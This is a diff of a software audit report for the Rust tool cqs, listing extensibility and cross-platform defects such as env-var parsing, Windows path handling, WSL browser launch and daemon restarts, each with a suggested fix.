+- **Description:** `env_disables_freshness_gate()` is the *only* CQS env-var consumer that respects `false` / `no` / `off` — every other env var in the codebase (30+ call sites grepped: `CQS_NO_DAEMON`, `CQS_DISABLE_BASE_INDEX`, `CQS_FORCE_BASE_INDEX`, `CQS_TRUST_DELIMITERS`, `CQS_LLM_PROVIDER`, `CQS_TELEMETRY`, `CQS_TELEMETRY_REDACT_QUERY`, `CQS_CHAT_HISTORY`, `CQS_WATCH_RECONCILE`, `CQS_DAEMON_PERIODIC_GC`, `CQS_CAGRA_PERSIST`, ...) does its own ad hoc match: some compare to `"0"` only, some to `"1"`, some `as_deref() != Ok("0")`, some `as_deref() == Ok("1")`. Net effect: `CQS_NO_DAEMON=false` is silently ignored (matches `Ok(_)` ≠ `Ok("1")`); `CQS_WATCH_RECONCILE=off` is also ignored (treated as enabled). Operators have to know which env var accepts which falsy spelling — and there is no shared spec. Adding a new boolean env knob means picking one of the 4-5 inconsistent shapes and re-typing it. The `cqs doctor` output (`collect_cqs_env_vars`) just dumps key/value verbatim; it can't tell you whether your `CQS_NO_DAEMON=false` is being honoured.
+- **Suggested fix:** Add `crate::env::truthy(name) -> bool` and `crate::env::falsy(name) -> bool` with one canonical falsy set (`"0" | "false" | "no" | "off"` lowercase) and one truthy set (`"1" | "true" | "yes" | "on"`). Audit the 30+ call sites and route all CQS_* boolean env reads through the helpers. Optional: register each known knob in an `ENV_REGISTRY` table (name, default, kind: Bool/Int/Path) so `cqs doctor --env-help` can list every knob, default, and parse status — replacing today's "set the var and hope the right code path matches your spelling" UX.
 
-#### `find_project_root` markers list is hardcoded — language-grammar registry has no link to "where would a project of this language root live"
-- **Difficulty:** easy
-- **Location:** `src/cli/config.rs:155-162` (hardcoded 6-marker list with embedded comment "EX-5: These markers are intentionally NOT derived from LanguageDef")
-- **Description:** The `markers` array `["Cargo.toml", "package.json", "pyproject.toml", "setup.py", "go.mod", ".git"]` is stable — the inline comment argues the alternative ("project_root_markers on LanguageDef") would dilute the language registry. Granted. But the *current shape* is a fixed array whose authoritative semantics are "these are the 5 languages with a unambiguous canonical project file, plus `.git` as fallback." It is documented as an intentional decision. The pressure point: if cqs ever grows first-class support for Maven (`pom.xml`), Gradle (`build.gradle`/`build.gradle.kts`), .NET solutions (`*.sln`), Bazel (`MODULE.bazel`/`WORKSPACE`), Mix (`mix.exs`), or Cargo workspaces with non-`Cargo.toml` markers — the list grows here, not in `languages.rs`. The decision "where does project-root-detection live" is settled, but the 6-marker list itself is documented as sufficient for now via a comment, not as data the registry actually owns.
-- **Suggested fix:** Convert to a `static PROJECT_ROOT_MARKERS: &[(&str, &str)] = &[("Cargo.toml", "rust"), …, (".git", "fallback")]` table at module level. The inline comment becomes the table's doc. Adding Maven (`pom.xml`, "java") is one row, not an `if current.join("pom.xml").exists()` arm. The "is this a workspace root?" Cargo-specific branch at `:167-172` keeps its dedicated logic but stops being in the middle of a `for marker in &markers` loop.
-
-#### Embedder constructor coupling: `define_embedder_presets!` rows generate `pub fn <variant_fn>(&self) -> Self` constructors but no per-preset config knob extension hook
-- **Difficulty:** easy
-- **Location:** `src/embedder/models.rs:163-300` (`define_embedder_presets!` macro), `:313-374` (the four shipped preset rows)
-- **Description:** Each preset row generates a method like `ModelConfig::bge_large(&self) -> Self` that fully populates `ModelConfig { repo, dim, max_seq_len, normalize_embeddings, query_prefix, doc_prefix, approx_download_bytes, pad_id, … }`. Adding a *cross-cutting* preset attribute (e.g. "this preset requires GPU because dim >= 1024", or "this preset's tokenizer expects BOS/EOS even though the default doesn't") means: editing `ModelConfig` (new field), editing the macro `@build_arm` to plumb the field through, editing every preset row to add the attribute. The 4 row × N field matrix is fine at 4 rows, but the preset-additive case still has a real fan-out per attribute. Verified by counting attributes per row: 9 fields per preset × 4 presets = 36 cells; one new field is 4 row-edits + 2 macro-edits.
-  
-  Lower priority than the others — the macro pattern actually *contains* this fan-out to one file. Flagging because the alternative (a `HashMap<&'static str, Value>` per row) would let adding a new attribute be a no-op for old presets that don't set it.
-- **Suggested fix:** Optional. If new preset attributes start landing frequently, extend the macro grammar with an `extras: { gpu_only = true, expects_bos = true }` block per row that maps to a `HashMap<&'static str, ModelAttr>` field on `ModelConfig`. Keeps required fields in the row's main shape, optional/sparse ones in `extras`. Skip if presets are stable.
-
-Summary: 9 extensibility findings. The original v1.29.0 9 findings have largely closed (registry refactor #1114, define_aux_presets, define_chunk_types, define_query_categories, ConfigSection, VisibilityRule extensions, NotesListArgs flatten, approx_download_bytes, Local LLM provider). Residual pressure now concentrates on (1) score-signal pluggability — RRF locked to two lists while SPLADE lives on a parallel α-blend path, (2) batch-side dispatch — `BatchCmd` enum + `is_pipeable` + dispatch matches did not get lifted into the registry alongside `Commands`, (3) provider/index backend selectors that still hand-code the "match on enum kind" factory shape despite having clean trait-objects on the consumer side, (4) implicit registries (project-root markers, structural matchers) that work fine today but document themselves as "intentionally not data" while bearing the structural-data shape.
-
+#### EX-V1.30.1-8: `Reranker` is a concrete struct with hardcoded ONNX-cross-encoder assumptions — no trait, no second implementation possible
+- **Difficulty:** hard
+- **Location:** `src/reranker.rs:108-167` (struct + ctor) + `:172-211` (rerank) + `:212-...` (rerank_with_passages)
+- **Description:** `Reranker` bakes "ONNX session + tokenizer + token_type_ids feature-detection" directly into the type. The `rerank` and `rerank_with_passages` entry points return `Result<(), RerankerError>` where `RerankerError` is itself ONNX-shaped (`Inference(String)` from `ort::Error`). Adding any non-ONNX scoring family — an LLM-judge reranker via the existing `BatchProvider` trait, a BM25-on-content baseline for evaluation parity with classic IR systems, a dot-product reranker over a different embedding model entirely (e.g. a tiny code-trained model), or a no-op pass-through for benchmarking — requires touching every callsite that holds a `&Reranker` (search, search_filtered, daemon batch path, eval harness, doctor) and either adding an enum or duplicating each callsite per-implementation. The codebase already extracted `BatchProvider` for LLMs (`src/llm/provider.rs:42`) — it's the right shape for rerankers too. The friction here also blocks one of the cheap eval gains the project has already prototyped (LLM-as-reranker for the v3.v2 fixture top-50 has been discussed in tears) because there's no plug point. The known BERT-vs-RoBERTa input-shape divergence (lines 121-124, comments 341-355) is *itself* a within-implementation polymorphism leak — `expects_token_type_ids: Mutex<Option<bool>>` is the kind of state a cleaner trait split would put in the impl, not the trait surface.
+- **Suggested fix:** Extract `pub trait Reranker: Send + Sync { fn rerank(&self, query: &str, results: &mut Vec<SearchResult>, limit: usize) -> Result<(), RerankerError>; fn rerank_with_passages(...); }`. The current struct becomes `OnnxReranker: Reranker`. Hold rerankers as `Arc<dyn Reranker>` everywhere — the existing Mutex-around-session pattern means `dyn` overhead is below the noise floor. Add `NoopReranker` (immediate use: eval harness ablations) and an `LlmReranker` skeleton that delegates to `BatchProvider`. The token-type-id feature detection becomes private to `OnnxReranker`.
 
 ## Platform Behavior
 
-#### `cqs serve` shutdown_signal handles only Ctrl-C — `systemctl stop` skips graceful drain on Linux
+#### PB-V1.30.1-1: `cmd_serve` `--no-auth` warning misses `0.0.0.0` and `::` wildcard binds — the most exposed configurations
 - **Difficulty:** easy
-- **Location:** src/serve/mod.rs:253-260
-- **Description:** `shutdown_signal()` awaits only `tokio::signal::ctrl_c()`. On Linux when `cqs serve` is run under systemd or any supervisor that issues `SIGTERM` (the default for `systemctl stop`), axum never sees the signal — it keeps serving until systemd escalates to `SIGKILL`. The watch daemon explicitly installs a SIGTERM handler via `libc::signal` (src/cli/watch.rs:132-148), but the serve binary does not. On macOS `launchd` ALSO sends SIGTERM by default. Result: the "press Ctrl-C to stop" banner is the only documented graceful shutdown, and any service-manager wrapper sees forced kills with no graceful_shutdown future polled.
-- **Suggested fix:** On `cfg(unix)` race `tokio::signal::ctrl_c()` against `tokio::signal::unix::signal(SignalKind::terminate())` via `tokio::select!`. On Windows also accept `ctrl_break()` and `ctrl_close()`.
+- **Location:** `src/cli/commands/serve.rs:27`
+- **Description:** The "non-loopback + no-auth" warning fires on `--bind 192.168.1.5 --no-auth` (correct), but is silent for the two binds that expose the server to *every* interface: `0.0.0.0` and `::`. The check is `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"` — passes wildcard strings unchanged. Wildcard binds also trigger the empty-allowlist code path in `allowed_host_set` (mod.rs:285) which logs a warn but doesn't block; combined with `--no-auth`, the operator gets an un-authenticated server reachable from any interface and only sees the (unrelated) wildcard-allowlist warning. The intent was "warn on anything that isn't loopback" — wildcard binds are *more* exposed than a concrete LAN IP and should warn at minimum.
+- **Suggested fix:** Parse `bind` as `IpAddr` once, then warn on `!ip.is_loopback()`. Falls through cleanly to `localhost` / hostname strings (treat parse-fail as non-loopback). This also subsumes `0.0.0.0` and `::` because `Ipv4Addr::UNSPECIFIED.is_loopback() == false`.
 
-#### `EmbeddingCache::default_path` and `QueryCache::default_path` hardcode `~/.cache/cqs/...` on Windows
+#### PB-V1.30.1-2: `--bind localhost` documented as valid but always fails `SocketAddr::parse`
 - **Difficulty:** easy
-- **Location:** src/cache.rs:80-84, 1399-1403; src/cli/batch/commands.rs:373-376
-- **Description:** Three paths hardcode `dirs::home_dir().join(".cache/cqs/...")`. On Windows this materializes as `C:\Users\X\.cache\cqs\embeddings.db` / `query_cache.db` / `query_log.jsonl`. The native conventions place caches under `%LOCALAPPDATA%\cqs\` (which `dirs::cache_dir()` returns). This is the same defect class as triaged PB-V1.29-8 (HF cache), but PB-V1.29-8 covers HF only; embedding/query caches and the daemon query-log are independent code paths still using the hardcoded layout. Result: Windows users get a hidden `.cache` folder in their home dir that backup tools / antivirus scans don't expect, and dual cqs installs can't share caches with HF tooling that does honor `%LOCALAPPDATA%`.
-- **Suggested fix:** Use `dirs::cache_dir().unwrap_or_else(|| dirs::home_dir().join(".cache")).join("cqs")` for all three paths, mirroring `aux_model::hf_cache_dir`'s fallback chain.
+- **Location:** `src/cli/commands/serve.rs:39-41`, `src/cli/definitions.rs:842-849`
+- **Description:** The `cmd_serve` no-auth gate at line 27 explicitly compares `bind != "localhost"`, suggesting `--bind localhost` is a supported value. But the very next line (`format!("{bind}:{port}").parse::<SocketAddr>()`) only accepts IP literals — `"localhost:8080"` errors with `invalid IP address syntax`. The user gets `Failed to parse localhost:8080 as a SocketAddr` after seeing CLI help that doesn't disclaim hostname binds. This is also inconsistent with the `cookie_name_for_port` cookie-jar comment in `src/serve/auth.rs:49-55` which name-checks `localhost`.
+- **Suggested fix:** Either (a) resolve `localhost` to `127.0.0.1` (`ToSocketAddrs` lookup, take first IPv4) before parse, with a debug log noting the resolution, or (b) reject hostname binds explicitly with a clear error pointing at the `--bind 127.0.0.1` flag. Option (a) matches what users expect from every other web server CLI.
 
-#### `dispatch_drift` JSON `file` field is normalized but `dispatch_diff` JSON file fields are not (PB-V1.29-5 partial dupe — additional unfixed sites)
-- **Difficulty:** easy
-- **Location:** src/suggest.rs:101 (`dead.chunk.file.display().to_string()`), src/store/types.rs:220 (`file_display = file.display().to_string()`)
-- **Description:** PB-V1.29-5 covers `dispatch_drift`/`dispatch_diff` in `cli/batch/handlers/misc.rs`. There are at least two more sites that emit Windows backslashes the same way and aren't on the triage list: `suggest::dead_code` returns `Suggestion.file` via `dead.chunk.file.display().to_string()` (rendered into JSON), and `store::types` uses `file_display` for log messages tied to type-edge upserts. Both leak `\` separators into agent-visible output on Windows.
-- **Suggested fix:** Replace `.display().to_string()` with `crate::normalize_path(...)` in both sites; add a clippy lint or a doc-tested helper to make the convention discoverable.
-
-#### `serve::open_browser` on Windows passes URL to `explorer.exe` — drops query string / token
+#### PB-V1.30.1-3: `process_exists` (Windows) substring-matches the literal `"INFO:"` against localized `tasklist` output
 - **Difficulty:** medium
-- **Location:** src/cli/commands/serve.rs:89-104
-- **Description:** `cmd_serve --open` invokes `explorer.exe <url>` on Windows. `explorer.exe` does not interpret a URL argument as a navigation target the way `xdg-open`/`open` do — it tries to open the URL as a path, frequently noops or pops a "Windows can't find" dialog, and on success may strip the `?token=...` query string when handed off to the default browser through DDE. With #1096 auth on by default the token is mandatory; users on Windows lose the one-click experience documented at line 67-82. The other two arms (`xdg-open`, `open`) correctly forward.
-- **Suggested fix:** Use `cmd /C start "" "<url>"` on Windows (the empty title is required so `start` parses the URL as the target, not the title). Alternative: use the `opener` crate which already encodes this behavior across platforms.
+- **Location:** `src/cli/files.rs:59-72`
+- **Description:** `tasklist /FI "PID eq <pid>" /NH` emits the localized string `INFO: No tasks are running which match the specified criteria.` when no process matches. The Windows-side stale-PID detection at `acquire_index_lock` (line 218) checks `!output.contains("INFO:")` — this is `true` (process "exists") on every locale where the prefix isn't literally `"INFO:"`. German (`INFORMATION:`), French (`INFORMATIONS:`), Japanese (`情報:`), and most non-English Windows installs surface a different prefix. On those systems a stale lock is *never* detected because `process_exists` always returns `true`, so the stale-lock retry loop at `files.rs:213-231` never fires and the user gets `Another cqs process holds the index lock at .../index.lock (PID 1234 may be stale)` even when PID 1234 is long dead. The user has to manually delete the lock file every time.
+- **Suggested fix:** Don't parse human-readable output. Use the CSV format and check exit code / row count instead: `tasklist /FI "PID eq <pid>" /FO CSV /NH` — when no match exists the stdout is empty (or just a header line); when a match exists exactly one row is emitted. Alternatively call the Win32 `OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...)` via `windows-sys` — already in scope as a transitive of `notify` — which returns immediately without spawning a subprocess.
 
-#### `find_ld_library_dir` splits on `:` — incorrect on Windows / wrong env var name
-- **Difficulty:** easy
-- **Location:** src/embedder/provider.rs:115-123
-- **Description:** `find_ld_library_dir` is `cfg(target_os = "linux")`-gated, so this is currently dormant. But the `ensure_ort_provider_libs` helper has only a Linux arm — there is no equivalent for Windows or macOS. Consequence: when ORT ships on Windows targets the only fallback for finding provider DLLs is the system loader's PATH search, with no logging of where it actually looked. Documenting the gap in the function header and adding a Windows arm that walks `PATH` (split on `;`, looking for `onnxruntime_providers_*.dll`) makes the cross-platform CUDA story explicit instead of "Linux works, others get whatever ORT happens to do."
-- **Suggested fix:** Either add `#[cfg(target_os = "windows")]` arms to `ensure_ort_provider_libs` / `find_ort_provider_dir` that walk `PATH` with `;` separator and look for `.dll`, or add a top-level doc comment stating the Windows path resolution is delegated entirely to ORT and confirming the release CI tests catch the failure mode.
-
-#### `ProjectRegistry` doc claims `~/.config/cqs/projects.toml` but `dirs::config_dir()` returns macOS-specific path
-- **Difficulty:** easy
-- **Location:** src/project.rs:1-3, 176-179
-- **Description:** Module-level doc says "Maintains a registry of indexed projects at `~/.config/cqs/projects.toml`". On macOS `dirs::config_dir()` returns `~/Library/Application Support/`, so the actual file lives at `~/Library/Application Support/cqs/projects.toml`. On Windows it lives at `%APPDATA%\cqs\projects.toml`. macOS and Windows users following the doc to find / edit the registry will look in the wrong place. The path is constructed correctly via `dirs::config_dir()` — only the doc is lying. (Per memory note `feedback_docs_lying_is_p1.md`: docs lying about a path users will run `ls`/`open` on is a P1 correctness bug, not "just docs".)
-- **Suggested fix:** Update both the module doc and the `load`/`save` doc comments to enumerate the three platform paths, e.g. "Linux: `~/.config/cqs/`, macOS: `~/Library/Application Support/cqs/`, Windows: `%APPDATA%\cqs\`". Mention `dirs::config_dir()` as the source of truth.
-
-#### `index.lock` `flock` is advisory on Linux but mandatory on Windows — different failure modes for cross-tooling
+#### PB-V1.30.1-4: `open_browser` on WSL launches a Linux browser via `xdg-open` instead of the Windows-side default browser
 - **Difficulty:** medium
-- **Location:** src/cli/files.rs:120-213
-- **Description:** `acquire_index_lock` uses `std::fs::File::try_lock` (introduced in Rust 1.89, MSRV 1.93+). On Linux this maps to `flock(LOCK_EX|LOCK_NB)` — purely advisory; non-cqs writers (e.g. an editor saving the DB after a crash, an external SQLite tool) will silently corrupt the index. On Windows it maps to `LockFileEx` which is mandatory and prevents *any* other process from opening the file with a conflicting share mode — including a benign `sqlite3.exe` or backup tool that opens with `FILE_SHARE_READ` but no `FILE_SHARE_WRITE`. The function-level doc covers the WSL `/mnt/c` case but does not document the Linux-vs-Windows mandatory-vs-advisory difference, and `is_wsl_drvfs_path` is not consulted before deciding to trust the lock. Result: same code, two very different concurrency contracts that callers cannot distinguish at runtime.
-- **Suggested fix:** Add a `tracing::warn!` once at startup on Windows noting that the lock is mandatory and that opening `index.db` from another process while the lock is held will fail with sharing violation. Document the Linux/Windows split in the `acquire_index_lock` doc-comment alongside the existing WSL paragraph.
+- **Location:** `src/cli/commands/serve.rs:99-132`
+- **Description:** WSL satisfies `cfg(target_os = "linux")` so the Linux branch fires `xdg-open <url>`. On a fresh WSL install there is no Linux GUI / browser, so `xdg-open` either errors with `xdg-open: no method available for opening 'http://127.0.0.1:8080/?token=...'` or hangs trying to launch a non-existent browser. The user sees `WARN: --open requested but failed to launch browser` and has to copy-paste the URL into Windows. The intended behavior on WSL is `cmd.exe /c start <url>` (or `wslview <url>` if `wslu` is installed) which hands the URL to the Windows default browser. `is_wsl()` already exists in `src/config.rs:47` and is used elsewhere — `open_browser` ignores it.
+- **Suggested fix:** Branch on `is_wsl()` first inside the linux arm: try `wslview` (preferred — handles auth-token URLs cleanly), fall back to `cmd.exe /c start "" "<url>"` (note: `cmd.exe` works from WSL Linux because the interop layer translates), and only fall through to `xdg-open` on non-WSL Linux. A successful spawn on any of the three is enough.
 
-#### `is_wsl_drvfs_path` only matches single-letter drive mounts — misses `wsl.localhost` and explicit-uppercase mounts
-- **Difficulty:** easy
-- **Location:** src/config.rs:92-101
-- **Description:** The pattern requires exactly `/mnt/<lowercase letter>/`. WSL2 also exposes Windows drives under `//wsl.localhost/<distro>/mnt/c/...` and (when accessed from the Windows side) `\\wsl$\<distro>\mnt\c\...`. Additionally, `wsl.conf` `automount.options=case=force` allows uppercase drive letters. The `cli/watch.rs::create_watcher` code at line 1483-1489 already explicitly checks for `//wsl` and `is_under_wsl_automount`, but the *shared* helper used by config / project / hnsw doesn't, so those three sites still treat WSL DrvFS paths reached via UNC as native Linux. They'll then warn about world-readable perms (line 497-503) on a path where Linux-side perms are meaningless.
-- **Suggested fix:** Extend `is_wsl_drvfs_path` to also match `//wsl.localhost/`, `//wsl$/`, and uppercase drive letters. Test via `daemon_translate` style tests that fix `WSL_DISTRO_NAME`.
-
-#### `git_file = rel_file.replace('\\', "/")` only normalizes one direction — Windows-origin chunk IDs slip through
-- **Difficulty:** easy
-- **Location:** src/cli/commands/io/blame.rs:113-115
-- **Description:** Comment says "PB-3: Windows compat" and the `replace('\\', "/")` covers the common case where chunk.file came from `cqs::normalize_path` (forward-slash). But `chunk.file` can also be a `PathBuf` whose components include the verbatim `\\?\` prefix when the chunk was inserted from a path that bypassed `normalize_path` (e.g. a partial / pre-DS2-1 fix path). The replace would emit `//?/C:/Projects/...` to git, which git rejects with "ambiguous argument". A symmetric strip via `crate::normalize_slashes(&rel_file)` (which calls `strip_windows_verbatim_prefix` first) is what the rest of the codebase uses.
-- **Suggested fix:** `let git_file = crate::normalize_slashes(&rel_file);` — covers both backslash conversion and `\\?\` strip in one call, matching the convention established in src/lib.rs:420.
-
-#### `daemon_socket_path` falls back to `std::env::temp_dir()` on `XDG_RUNTIME_DIR` unset — different parent-dir trust on macOS
+#### PB-V1.30.1-5: `events.rs` mtime-equality skip is wrong on macOS HFS+ (1-second resolution) — only `is_wsl_drvfs_path` triggers the strict `<` check
 - **Difficulty:** medium
-- **Location:** src/daemon_translate.rs:179-188
-- **Description:** Linux desktops set `XDG_RUNTIME_DIR=/run/user/<uid>` (mode 0700, owned by the user). When unset (headless servers, container minimal images, macOS where `XDG_RUNTIME_DIR` is not standard), the code falls back to `std::env::temp_dir()` — `/tmp` on Linux, `/var/folders/.../T` on macOS. macOS's `/var/folders/...` is per-user-and-bootstrap and reasonably private (mode 0700), but Linux `/tmp` is mode 1777. The umask wrap at watch.rs:1626 narrows the bind window, and the explicit `chmod 0o600` at watch.rs:1637 is the actual access gate. Still, the silent fallback hides a meaningful trust boundary: on a Linux multi-user system without `XDG_RUNTIME_DIR`, the socket lives in a directory where another local user can `unlink` it (or `mkfifo` over its name during the bind race). The doc comment notes the issue (line 1615-1622 SEC-D.6) but `daemon_socket_path` itself doesn't log when the fallback fires.
-- **Suggested fix:** When `XDG_RUNTIME_DIR` is unset on Linux, log `tracing::info!("XDG_RUNTIME_DIR unset — daemon socket falls back to temp_dir; consider setting XDG_RUNTIME_DIR=/run/user/$(id -u)")` once per process. On macOS the fallback is fine — gate the warning on `cfg(target_os = "linux")` so it's only emitted where `/tmp` is actually shared.
+- **Location:** `src/cli/watch/events.rs:85-102`
+- **Description:** Comment claims "On Linux/macOS we keep the original `<=` because sub-second mtimes there are reliable and equality genuinely means same content". This is true for ext4 / APFS / btrfs. It is **false** for HFS+ on macOS (1-second mtime resolution) and for SMB/NFS shares mounted on macOS / Linux. Two saves of the same file within the same second produce identical mtimes; the watch loop sees the second save's mtime equal to `last_indexed_mtime` and skips the reindex. The user's last edit silently doesn't make it into the index. HFS+ is rare on modern Macs but still common on external drives, Time Machine restores, and any user on macOS < 10.14 (which kept HFS+ as default for spinning disks). The `is_wsl_drvfs_path`-only gate at line 95 misses every non-WSL coarse-mtime filesystem.
+- **Suggested fix:** Change the predicate from "is WSL drvfs" to "is the cached mtime within `coarse_fs_resolution()` of `mtime`". Treat any cached value that's `<= 1s` away from `mtime` as ambiguous and force-reindex. Cheap conservative default; the cost is at most one redundant reindex on rapid re-saves on fine-grained filesystems, vs. silent missed reindexes on coarse ones.
 
-#### NTFS mtime resolution is 100ns but Windows-side editors update mtime at 2s granularity in some configurations — `prune_last_indexed_mtime` watermark too tight
-- **Difficulty:** medium
-- **Location:** src/cli/watch.rs:551-560 (and wider mtime-keyed change-detection in `should_reindex`)
-- **Description:** `last_indexed_mtime` is a `HashMap<PathBuf, SystemTime>` and the watcher decides "skip unchanged mtime" via exact `SystemTime` equality. NTFS file timestamp resolution is documented as 100ns, but FAT32 (still mounted on USB sticks, recovery partitions, and some `/mnt/<letter>/` paths) has 2-second resolution on writes. WSL DrvFS exposes the underlying NTFS mtime, but Windows-side `notepad.exe` saves can lose sub-second precision when the underlying filesystem is FAT32. Two saves within 2s on a FAT32 mount will therefore collide on the same mtime and the watch loop will skip the second — a real correctness gap on `/mnt/d` if D: is a USB stick. There's a 1s debounce auto-bump on WSL DrvFS (line 1495-1500) that masks most of this, but the equality check against the cached mtime doesn't.
-- **Suggested fix:** When `is_wsl_drvfs_path(file)` is true, treat mtime equality with `<` instead of `==` over a 2-second buckets, OR fall back to content-hash comparison (already computed for parser ingest) when mtime equality is suspicious. Document the FAT32 caveat in the function header.
-
-#### `serve::enforce_host_allowlist` accepts missing Host header — dev-only ergonomic leaks into production
+#### PB-V1.30.1-6: `atomic_replace` opens the parent directory and calls `sync_all` on every Windows write — opens always fail, debug-spam on every persisted file
 - **Difficulty:** easy
-- **Location:** src/serve/mod.rs:230-251
-- **Description:** Comment at lines 230-233 explains the bypass: "A missing `Host:` header passes through — HTTP/1.1 requires one and hyper always provides one on real traffic, but unit tests built via `Request::builder()` without a `.uri()` that includes a host don't get one synthesized, and we'd rather not break that ergonomic." That's a unit-test ergonomic baked into the production middleware. A non-browser HTTP/1.0 client (or HTTP/2 client that uses `:authority` but routes through a proxy that strips it) reaches the handler with no Host header, bypassing the DNS-rebinding allowlist that SEC-1 closes for browser traffic. The auth token (#1096) covers this in default config, but `--no-auth` exposes it.
-- **Suggested fix:** In production code reject missing Host with 400, and in `tests.rs` add `Host: localhost` to the `Request::builder()` fixtures (cheap one-liner). Or gate the bypass on `cfg(test)`.
+- **Location:** `src/fs.rs:90-108`
+- **Description:** Step 3 (parent-dir fsync) is documented as "no-op on Windows because NTFS journals the rename" (lines 39-40), but the code unconditionally tries `std::fs::File::open(parent)`. On Windows, opening a directory as a `File` requires `FILE_FLAG_BACKUP_SEMANTICS` which Rust's `std::fs::File::open` does not pass. The open fails with `Access is denied. (os error 5)` for every directory on Windows. The function then logs at `debug!` level: `could not open parent dir for fsync after atomic_replace (non-fatal)`. Every config save, slot save, embedding-cache write, and SQLite WAL checkpoint emits one of these in `RUST_LOG=debug`. Not a correctness bug (we *want* the no-op on Windows) but the implementation does it the wrong way around — it tries-and-fails rather than skipping.
+- **Suggested fix:** Wrap the parent-fsync block in `#[cfg(unix)]` and elide it entirely on Windows. The doc comment already promises this behavior. As a bonus the code is faster on Windows because we skip a syscall.
 
+#### PB-V1.30.1-7: `cqs hook fire` on Windows can never reach the daemon — hook scripts always degrade to `.cqs/.dirty`, but no Windows daemon exists to consume the marker
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/infra/hook.rs:309-335`, daemon at `src/cli/watch/mod.rs:593-608`
+- **Description:** `cqs hook fire` (line 309) is `#[cfg(unix)]`-gated for the daemon path; on Windows it falls through to `.cqs/.dirty`. The daemon-startup path that promotes `.cqs/.dirty` into a one-shot reconcile (`watch/mod.rs:593-608`) only runs from `cqs watch --serve`, which itself requires Unix sockets and does not start on Windows-native (the watch loop's daemon thread is `#[cfg(unix)]` at `mod.rs:621`). So a Windows-native user who runs `cqs hook install`, then does `git checkout`, gets a `.cqs/.dirty` file that nothing will ever read — every reconcile mechanism is unix-gated. The user must manually run `cqs index` after every git operation, defeating the entire #1182 layer. `cqs hook status` will report `daemon_up: false` (line 367-370 is also `#[cfg(unix)]`) but `cqs hook install` happily writes the hooks regardless.
+- **Suggested fix:** Either (a) refuse to install hooks on Windows-native with a clear error pointing at the `cqs index` workaround, or (b) make `cqs index` (the foreground reindex command) check for `.cqs/.dirty` at startup and consume it. (b) is the smaller change and gives Windows users equivalent functionality on next manual reindex. The hook script body's `command -v cqs` short-circuit at `hook.rs:246` already prevents broken hooks on hosts without cqs installed; just make the consumer side platform-portable.
 
+#### PB-V1.30.1-8: `dispatch_drift` / `cqs hook install` write platform-native paths into the install report — `git_dir` field is `\`-separated on Windows but every other JSON consumer expects `/`
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/hook.rs:99-105, 152, 354`
+- **Description:** `InstallReport`, `UninstallReport`, `StatusReport`, and `FireReport` all carry `git_dir: PathBuf` and `dirty_marker: Option<PathBuf>` and serialize via `serde_json` (line 408) which renders Windows `PathBuf` as `"C:\\Projects\\repo\\.git\\hooks"` (escaped backslashes). Every other JSON field in cqs that names a path uses `normalize_path()` / `normalize_slashes()` to emit forward slashes (per the audit fix at `src/store/types.rs:220` for `dispatch_drift`). The hook reports were not migrated. A consumer parsing the structured output (`cqs hook install --json | jq '.git_dir'`) gets `"C:\\Projects\\repo\\.git\\hooks"` on Windows but `"/home/user/repo/.git/hooks"` on Linux — string-equality and substring-matching against this output break.
+- **Suggested fix:** Either (a) change `git_dir: PathBuf` to `git_dir: String` and store `cqs::normalize_path(&path)` at construction, or (b) wrap a serialize-with helper that calls `normalize_path` for every `PathBuf`-typed field on serialization. Match the convention already established in the rest of the JSON surface.
+
+#### PB-V1.30.1-9: `reconcile.rs:128` inserts non-normalized `PathBuf` into `pending_files`, but the canonical key in `last_indexed_mtime` and the watch debounce queue compare against OS-native PathBufs from `notify` events — Windows path-separator skew possible
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/reconcile.rs:103, 128`; cross-ref `src/cli/watch/events.rs:84, 109`
+- **Description:** `enumerate_files` (lib.rs:578-688) returns paths via `dunce::canonicalize` then `strip_prefix(&root)` — on Windows these have backslashes. `reconcile.rs:103` and `:128` insert these into `pending_files: HashSet<PathBuf>`. The `notify` event path at `events.rs:84` does `path.strip_prefix(cfg.root)` on the watcher's own path — `notify` on Windows uses `ReadDirectoryChangesW` which produces backslash paths; on Linux native paths come back forward-slash. Both inserters end up agreeing on the same OS-native shape so the `HashSet` deduplicates correctly *today*. But the comment at `reconcile.rs:96-99` ("normalize to forward slashes for cross-platform matching parity with the rest of the store layer") is misleading — only the *origin lookup string* gets normalized; the `pending_files` key does not. If a future refactor on the events.rs side adds normalization (or a code path uses raw event paths without strip_prefix), the two queues will silently fragment on Windows: same file enqueued twice, double-reindex, double-mtime-update. There is no test that pins this contract.
+- **Suggested fix:** Document the invariant at the top of `pending_files` declaration ("PathBuf keys are OS-native; do not normalize in producers") and add a debug-assertion at insertion sites that the key does not contain a backslash on `cfg(unix)` (catches accidental Windows-format leakage from a future change).
+
+#### PB-V1.30.1-10: `restart_daemon_if_needed` Linux branch hardcodes the systemd unit name — a user-installed cqs without the systemd unit gets a confusing `Unit cqs-watch.service not found` after `cqs model use`
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/model.rs:710-738`
+- **Description:** The Linux restart path runs `systemctl --user start cqs-watch` unconditionally. If the user did not install the systemd unit (running `cqs watch --serve` from a tmux pane, from a containerized init, from `nohup`, or with `runit`/`s6`/`launchd`-style supervisors), `systemctl --user start cqs-watch` fails with `Failed to start cqs-watch.service: Unit cqs-watch.service not found.` and the user gets `warning: failed to restart cqs-watch daemon (systemctl exited Some(5)). Run systemctl --user start cqs-watch manually.` — telling them to run the same command that just failed. The macOS branch at line 745 spawns the binary directly, which is the platform-portable behavior the Linux branch should fall back to when systemctl reports `Unit not found`.
+- **Suggested fix:** On Linux, when `systemctl --user is-enabled cqs-watch` (cheap probe) reports the unit isn't loaded, fall back to spawning `cqs watch --serve` directly — same path the macOS branch takes. The probe can be done once and cached per process. Alternatively check `was_running` provenance (was the daemon started by systemctl, or by direct spawn?) and route the restart accordingly.
 ## Security
 
-> All eight previously-listed findings (DNS-rebinding host-allowlist,
-> XSS via `body.slice()` → `innerHTML`, IN-list / SQL-LIMIT DoS, LIKE-wildcard
-> injection in `file` and `tests-cover`, `cmd_serve` / `xdg-open` URL hazard,
-> unauthenticated serve) are already in `docs/audit-triage-v1.30.0.md` as
-> SEC-1 … SEC-8. SEC-7 (no-auth) is fixed by #1118. The findings below are
-> NEW exposures introduced by the v1.30.0 surface (auth token plumbing,
-> tracing, host-header edge cases) that the prior pass did not catch.
-
